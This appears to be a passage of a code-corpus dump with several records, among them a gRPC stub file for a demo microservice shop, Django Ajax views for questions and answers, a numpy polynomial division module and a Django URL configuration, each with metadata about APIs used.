target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.PaymentService/Charge',\n demo__pb2.ChargeRequest.SerializeToString,\n demo__pb2.ChargeResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass EmailServiceStub(object):\n \"\"\"-------------Email service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.SendOrderConfirmation = channel.unary_unary(\n '/hipstershop.EmailService/SendOrderConfirmation',\n request_serializer=demo__pb2.SendOrderConfirmationRequest.SerializeToString,\n response_deserializer=demo__pb2.Empty.FromString,\n )\n\n\nclass EmailServiceServicer(object):\n \"\"\"-------------Email service-----------------\n\n \"\"\"\n\n def SendOrderConfirmation(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_EmailServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'SendOrderConfirmation': grpc.unary_unary_rpc_method_handler(\n servicer.SendOrderConfirmation,\n request_deserializer=demo__pb2.SendOrderConfirmationRequest.FromString,\n response_serializer=demo__pb2.Empty.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.EmailService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass EmailService(object):\n \"\"\"-------------Email service-----------------\n\n \"\"\"\n\n @staticmethod\n def SendOrderConfirmation(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.EmailService/SendOrderConfirmation',\n demo__pb2.SendOrderConfirmationRequest.SerializeToString,\n demo__pb2.Empty.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass CheckoutServiceStub(object):\n \"\"\"-------------Checkout service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.PlaceOrder = channel.unary_unary(\n '/hipstershop.CheckoutService/PlaceOrder',\n request_serializer=demo__pb2.PlaceOrderRequest.SerializeToString,\n response_deserializer=demo__pb2.PlaceOrderResponse.FromString,\n )\n\n\nclass CheckoutServiceServicer(object):\n \"\"\"-------------Checkout service-----------------\n\n \"\"\"\n\n def PlaceOrder(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CheckoutServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'PlaceOrder': grpc.unary_unary_rpc_method_handler(\n servicer.PlaceOrder,\n request_deserializer=demo__pb2.PlaceOrderRequest.FromString,\n response_serializer=demo__pb2.PlaceOrderResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.CheckoutService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass CheckoutService(object):\n \"\"\"-------------Checkout service-----------------\n\n \"\"\"\n\n @staticmethod\n def PlaceOrder(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CheckoutService/PlaceOrder',\n demo__pb2.PlaceOrderRequest.SerializeToString,\n demo__pb2.PlaceOrderResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass AdServiceStub(object):\n \"\"\"------------Ad service------------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetAds = channel.unary_unary(\n '/hipstershop.AdService/GetAds',\n request_serializer=demo__pb2.AdRequest.SerializeToString,\n response_deserializer=demo__pb2.AdResponse.FromString,\n )\n\n\nclass AdServiceServicer(object):\n \"\"\"------------Ad service------------------\n\n \"\"\"\n\n def GetAds(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_AdServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetAds': grpc.unary_unary_rpc_method_handler(\n servicer.GetAds,\n request_deserializer=demo__pb2.AdRequest.FromString,\n response_serializer=demo__pb2.AdResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.AdService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass AdService(object):\n \"\"\"------------Ad service------------------\n\n \"\"\"\n\n @staticmethod\n def GetAds(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.AdService/GetAds',\n demo__pb2.AdRequest.SerializeToString,\n demo__pb2.AdResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n", "sub_path": "src/emailservice/demo_pb2_grpc.py", "file_name": "demo_pb2_grpc.py", "file_ext": "py", "file_size_in_byte": 30091, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "demo_pb2.AddItemRequest", "line_number": 37, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 38, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetCartRequest", "line_number": 42, "usage_type": "attribute"}, {"api_name": "demo_pb2.Cart", "line_number": 43, "usage_type": "attribute"}, {"api_name": "demo_pb2.EmptyCartRequest", "line_number": 47, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 48, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 59, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 65, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 71, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 78, "usage_type": "call"}, {"api_name": "demo_pb2.AddItemRequest", "line_number": 80, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 81, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 83, "usage_type": "call"}, {"api_name": "demo_pb2.GetCartRequest", "line_number": 85, "usage_type": "attribute"}, {"api_name": "demo_pb2.Cart", "line_number": 86, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 88, "usage_type": "call"}, {"api_name": "demo_pb2.EmptyCartRequest", "line_number": 90, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 91, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 94, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 116, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 116, "usage_type": "attribute"}, {"api_name": "demo_pb2.AddItemRequest", "line_number": 117, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 118, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 133, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 133, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetCartRequest", "line_number": 134, "usage_type": "attribute"}, {"api_name": "demo_pb2.Cart", "line_number": 135, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 150, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 150, "usage_type": "attribute"}, {"api_name": "demo_pb2.EmptyCartRequest", "line_number": 151, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 152, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsRequest", "line_number": 170, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsResponse", "line_number": 171, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 182, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 189, "usage_type": "call"}, {"api_name": "demo_pb2.ListRecommendationsRequest", "line_number": 191, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsResponse", "line_number": 192, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 195, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 217, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 217, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsRequest", "line_number": 218, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListRecommendationsResponse", "line_number": 219, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 237, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListProductsResponse", "line_number": 238, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetProductRequest", "line_number": 242, "usage_type": "attribute"}, {"api_name": "demo_pb2.Product", "line_number": 243, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsRequest", "line_number": 247, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsResponse", "line_number": 248, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 259, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 265, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 271, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 278, "usage_type": "call"}, {"api_name": "demo_pb2.Empty", "line_number": 280, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListProductsResponse", "line_number": 281, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 283, "usage_type": "call"}, {"api_name": "demo_pb2.GetProductRequest", "line_number": 285, "usage_type": "attribute"}, {"api_name": "demo_pb2.Product", "line_number": 286, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 288, "usage_type": "call"}, {"api_name": "demo_pb2.SearchProductsRequest", "line_number": 290, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsResponse", "line_number": 291, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 294, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 316, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 316, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 317, "usage_type": "attribute"}, {"api_name": "demo_pb2.ListProductsResponse", "line_number": 318, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 333, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 333, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetProductRequest", "line_number": 334, "usage_type": "attribute"}, {"api_name": "demo_pb2.Product", "line_number": 335, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 350, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 350, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsRequest", "line_number": 351, "usage_type": "attribute"}, {"api_name": "demo_pb2.SearchProductsResponse", "line_number": 352, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteRequest", "line_number": 370, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteResponse", "line_number": 371, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderRequest", "line_number": 375, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderResponse", "line_number": 376, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 387, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 393, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 400, "usage_type": "call"}, {"api_name": "demo_pb2.GetQuoteRequest", "line_number": 402, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteResponse", "line_number": 403, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 405, "usage_type": "call"}, {"api_name": "demo_pb2.ShipOrderRequest", "line_number": 407, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderResponse", "line_number": 408, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 411, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 433, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 433, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteRequest", "line_number": 434, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetQuoteResponse", "line_number": 435, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 450, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 450, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderRequest", "line_number": 451, "usage_type": "attribute"}, {"api_name": "demo_pb2.ShipOrderResponse", "line_number": 452, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 470, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetSupportedCurrenciesResponse", "line_number": 471, "usage_type": "attribute"}, {"api_name": "demo_pb2.CurrencyConversionRequest", "line_number": 475, "usage_type": "attribute"}, {"api_name": "demo_pb2.Money", "line_number": 476, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 487, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 493, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 500, "usage_type": "call"}, {"api_name": "demo_pb2.Empty", "line_number": 502, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetSupportedCurrenciesResponse", "line_number": 503, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 505, "usage_type": "call"}, {"api_name": "demo_pb2.CurrencyConversionRequest", "line_number": 507, "usage_type": "attribute"}, {"api_name": "demo_pb2.Money", "line_number": 508, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 511, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 533, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 533, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 534, "usage_type": "attribute"}, {"api_name": "demo_pb2.GetSupportedCurrenciesResponse", "line_number": 535, "usage_type": "attribute"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 550, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 550, "usage_type": "attribute"}, {"api_name": "demo_pb2.CurrencyConversionRequest", "line_number": 551, "usage_type": "attribute"}, {"api_name": "demo_pb2.Money", "line_number": 552, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeRequest", "line_number": 570, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeResponse", "line_number": 571, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 582, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 589, "usage_type": "call"}, {"api_name": "demo_pb2.ChargeRequest", "line_number": 591, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeResponse", "line_number": 592, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 595, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 617, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 617, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeRequest", "line_number": 618, "usage_type": "attribute"}, {"api_name": "demo_pb2.ChargeResponse", "line_number": 619, "usage_type": "attribute"}, {"api_name": "demo_pb2.SendOrderConfirmationRequest", "line_number": 637, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 638, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 649, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 656, "usage_type": "call"}, {"api_name": "demo_pb2.SendOrderConfirmationRequest", "line_number": 658, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 659, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 662, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 684, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 684, "usage_type": "attribute"}, {"api_name": "demo_pb2.SendOrderConfirmationRequest", "line_number": 685, "usage_type": "attribute"}, {"api_name": "demo_pb2.Empty", "line_number": 686, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderRequest", "line_number": 704, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderResponse", "line_number": 705, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 716, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 723, "usage_type": "call"}, {"api_name": "demo_pb2.PlaceOrderRequest", "line_number": 725, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderResponse", "line_number": 726, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 729, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 751, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 751, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderRequest", "line_number": 752, "usage_type": "attribute"}, {"api_name": "demo_pb2.PlaceOrderResponse", "line_number": 753, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdRequest", "line_number": 771, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdResponse", "line_number": 772, "usage_type": "attribute"}, {"api_name": "grpc.StatusCode", "line_number": 783, "usage_type": "attribute"}, {"api_name": "grpc.unary_unary_rpc_method_handler", "line_number": 790, "usage_type": "call"}, {"api_name": "demo_pb2.AdRequest", "line_number": 792, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdResponse", "line_number": 793, "usage_type": "attribute"}, {"api_name": "grpc.method_handlers_generic_handler", "line_number": 796, "usage_type": "call"}, {"api_name": "grpc.experimental.unary_unary", "line_number": 818, "usage_type": "call"}, {"api_name": "grpc.experimental", "line_number": 818, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdRequest", "line_number": 819, "usage_type": "attribute"}, {"api_name": "demo_pb2.AdResponse", "line_number": 820, "usage_type": "attribute"}]} +{"seq_id": "439205128", "text": "from django.shortcuts import render\nfrom discusion.models import Pregunta, Respuestas\nfrom django.http import HttpResponse, Http404\nimport json\n\n\ndef guardar_pregunta(request):\n if request.is_ajax():\n\n if request.POST['pregunta']:\n pregunta = Pregunta(titulo=request.POST['pregunta'])\n pregunta.save()\n\n #Traemos las preguntas guardadas para mostrarlas desde la mas reciente\n preguntas = Pregunta.objects.all().order_by('-id')\n\n #luego pasamos la lista a la peticion Ajax pero serializadas o en forma de lista\n\n data = list()\n\n for pregunta in preguntas:\n data.append({'id': pregunta.pk, 'titulo': pregunta.titulo})\n\n return HttpResponse(\n json.dumps({'preguntas': data}),\n content_type = \"application/json; charset=utf8\"\n )\n else:\n raise Http404\n\n\ndef cargar_respuestas(request,id ):\n if request.is_ajax():\n respuestas= Respuestas.objects.filter(pregunta__id=id).order_by('-id')\n\n data = list()\n\n for respuesta in respuestas:\n data.append(respuesta.titulo)\n return HttpResponse(\n json.dumps({'respuestas': data, 'pregunta': id}),\n content_type=\"application/json, charset=utf8\"\n )\n else:\n raise Http404\n\ndef guardar_respuesta(request):\n if request.is_ajax():\n\n if request.POST['respuesta']:\n\n respuesta = Respuestas(titulo=request.POST['respuesta'], pregunta_id=request.POST['pregunta'])\n respuesta.save()\n\n return cargar_respuestas(request, request.POST['pregunta'])\n", "sub_path": "miniplataforma/discusion/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1616, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "discusion.models.Pregunta", "line_number": 11, "usage_type": "call"}, {"api_name": "discusion.models.Pregunta.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "discusion.models.Pregunta.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "discusion.models.Pregunta", "line_number": 15, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 29, "usage_type": "name"}, {"api_name": "discusion.models.Respuestas.objects.filter", "line_number": 34, "usage_type": "call"}, {"api_name": "discusion.models.Respuestas.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "discusion.models.Respuestas", "line_number": 34, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "django.http.Http404", "line_number": 45, "usage_type": "name"}, {"api_name": "discusion.models.Respuestas", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "191527131", "text": "from typing import Union\nimport numpy as np\nfrom numpy.polynomial.polynomial import Polynomial as Poly\nfrom lab01.circle import InverseMod\n\n\ndef rev(p: Poly, n: int) -> Poly:\n p = p.trim()\n result = p.coef[::-1]\n if len(p.coef) < n:\n result = np.concatenate([np.zeros(n - len(p.coef)), result])\n return Poly(result)\n\n\ndef PolyInverseModOverQ(f: Poly, mod_deg: int) -> Union[Poly, None]:\n if mod_deg < 1:\n raise ValueError('Не допустимое значение модуля')\n if f.coef[0] == 0:\n return None\n\n g = Poly([1 / f.coef[0]])\n r = int(np.ceil(np.log2(mod_deg)))\n d = 2\n for i in range(r):\n g = (2 * g - f * g ** 2).truncate(d)\n d <<= 1\n return g\n\n\ndef PolyInverseModOverZn(f: Poly, mod_deg: int, mod_ring: int) -> Union[Poly, None]:\n if mod_deg < 1 or mod_ring < 1:\n raise ValueError('Модуль не может быть меньше 1')\n\n if f.coef[0] == 0 or mod_ring == 1:\n return None\n\n f = Poly(np.mod(f.coef, mod_ring))\n\n c = InverseMod(f.coef[0], mod_ring)\n if c is None:\n return None\n\n g = Poly([c])\n r = int(np.ceil(np.log2(mod_deg)))\n d = 2\n\n for i in range(r):\n g = (2 * g - f * g ** 2).truncate(d)\n g = Poly(np.mod(g.coef, mod_ring))\n d <<= 1\n return g\n\n\ndef PolyDivModOverQ(a: Poly, b: Poly) -> (Poly, Poly):\n if not b.coef.any():\n raise ZeroDivisionError\n\n a = a.trim()\n b = b.trim()\n n, m = len(a.coef), len(b.coef)\n\n if n < m:\n return Poly([0]), a\n else:\n f = rev(b, m)\n g = PolyInverseModOverQ(f, n - m + 1)\n q = (rev(a, n) * g).truncate(n - m + 1)\n q = rev(q, n - m + 1)\n\n if len(q.coef) < n - m + 1:\n q.coef = np.concatenate([np.zeros(n - len(q)), q.coef])\n\n r = a - b * q\n r = r.trim()\n q = r.trim()\n return q, r\n\n\ndef PolyDivModOverZn(a: Poly, b: Poly, mod_r: int) -> (Poly, Poly):\n if mod_r < 1:\n raise ValueError\n\n if mod_r == 1:\n raise ZeroDivisionError\n\n a = Poly(np.mod(a.coef, mod_r))\n b = Poly(np.mod(b.coef, mod_r))\n\n a = a.trim()\n b = b.trim()\n n, m = len(a.coef), len(b.coef)\n\n if n < m:\n return Poly([0]), a\n else:\n f = rev(b, m)\n g = PolyInverseModOverZn(f, n - m + 1, mod_r)\n\n if g is None:\n raise ZeroDivisionError\n\n q = (rev(a, n) * g).truncate(n - m + 1)\n q = Poly(np.mod(q.coef, mod_r))\n q = rev(q, n - m)\n\n if len(q.coef) < n - m + 1:\n q.coef = np.concatenate([np.zeros(n - m + 1 - len(q)), q.coef])\n\n bq = Poly(np.mod((b * q).coef, mod_r))\n r = a - bq\n r = Poly(np.mod(r.coef, mod_r))\n q = Poly(np.mod(q.coef, mod_r))\n r = r.trim()\n q = q.trim()\n return q, r\n", "sub_path": "lab04/lab04.py", "file_name": "lab04.py", "file_ext": "py", "file_size_in_byte": 2831, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 37, "usage_type": "call"}, {"api_name": "lab01.circle.InverseMod", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 49, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 79, "usage_type": "name"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.polynomial.polynomial.Polynomial", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "294585102", "text": "'''\nCreated on 16.08.2012\n\n@author: apollov\n'''\nfrom django.conf.urls import patterns, url\n\nfrom views import (retailer_list, russia_partners, world_partners, \n stores_map, supermarkets_map, units_map, export_excel,\n recommendations)\n\n\nclass PartnersSite(object):\n def __init__(self, name='partners', app_name='partners'):\n self.name = name\n self.app_name = app_name\n\n def get_urls(self):\n urlpatterns = patterns('',\n #url(r'^retailer/$', retailer_list, name='retailer_list'),\n url(r'^supermarkets/$', supermarkets_map),\n url(r'^stores/$', stores_map),\n url(r'^units/$', units_map),\n url(r'^russia/$', russia_partners, name='russia_partners'),\n url(r'^world/$', world_partners, name='world_partners'),\n url(r'^export_excel/$', export_excel),\n url(r'^recommendations/$', recommendations),\n )\n\n return urlpatterns\n\n @property\n def urls(self):\n return self.get_urls(), self.app_name, self.name\n\nsite = PartnersSite()\n", "sub_path": "apps/partners/sites.py", "file_name": "sites.py", "file_ext": "py", "file_size_in_byte": 1092, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "views.supermarkets_map", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "views.stores_map", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "views.units_map", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "views.russia_partners", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": 